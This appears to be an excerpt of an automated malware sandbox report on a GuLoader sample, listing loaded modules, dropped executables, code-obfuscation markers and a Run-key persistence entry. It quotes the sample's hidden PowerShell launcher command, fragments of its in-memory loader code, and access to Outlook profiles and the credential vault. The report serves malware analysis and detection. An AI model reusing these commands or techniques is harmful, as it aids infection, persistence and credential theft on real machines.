Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: psiloses.lnk.0.dr LNK file: ..\..\Users\user\Music\forbindingers.Bam132
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2075195434.0000000008A34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2069285687.0000000007840000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615448213.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2233571308.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Overfondle.exe, 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2067651043.000000002027C000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065314777.00000000200C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2169674706.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.0000000003130000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.00000000032CE000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2164405246.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: Overfondle.exe, 00000008.00000003.2127890263.00000000200C1000.00000004.00000020.00020000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000003.2098058163.000000000047B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Overfondle.exe, Overfondle.exe, 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2067651043.000000002027C000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065314777.00000000200C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000003.2169674706.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.0000000003130000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.00000000032CE000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2164405246.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: cmd.pdb source: Overfondle.exe, 00000008.00000003.2127890263.00000000200C1000.00000004.00000020.00020000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000003.2098058163.000000000047B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000002.00000002.2075682584.0000000009E59000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tilbede $Fremstillede $Halsens), (Bypast @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Presidia152 = [AppDomain]::CurrentDomain.GetAssemblies()$global:Co
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Klovnenumrene)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Vilnis, $false).DefineType($Offentliggrelse
Obfuscated command line found
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" Jump to behavior
Suspicious powershell command line found
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0796CE08 pushfd ; iretd 2_2_0796CFA5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_093B9BDA push edi; retf 2_2_093B9BDB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_093B62BD push ecx; retf 2_2_093B62C3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_093B3EA3 push eax; ret 2_2_093B3EA4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_093B7C81 push ebp; ret 2_2_093B7C9F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_093BA6E7 pushfd ; iretd 2_2_093BA6E8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2043225F pushad ; ret 8_2_204327F9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204327FA pushad ; ret 8_2_204327F9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2043283D push eax; iretd 8_2_20432858
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204609AD push ecx; mov dword ptr [esp], ecx 8_2_204609B6
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_016662BD push ecx; retf 8_2_016662C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_0166A6E7 pushfd ; iretd 8_2_0166A6E8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_01669BDA push edi; retf 8_2_01669BDB
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_01667C81 push ebp; ret 8_2_01667C9F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_01663EA3 push eax; ret 8_2_01663EA4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031609AD push ecx; mov dword ptr [esp], ecx 14_2_031609B6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003E0046 push FFFFFF8Ch; iretd 14_2_003E0077
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003D21B0 push esi; retf 14_2_003D21BB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003C8208 push ds; retf 14_2_003C820A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003E0270 push edi; iretd 14_2_003E0278
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003E0268 push edi; iretd 14_2_003E0278
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003D039F push ss; ret 14_2_003D03C4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003D03D1 push E16F236Ah; retn 0031h 14_2_003D03D6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003D43C0 push edi; retf 14_2_003D43CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003DCBAE push eax; retf 14_2_003DCBB1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003D4FC8 pushfd ; retf 14_2_003D4FDD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003DB681 push ebp; ret 14_2_003DB68C
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Overfondle.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe File created: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll Jump to dropped file
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Hakkebrttet Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Hakkebrttet Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
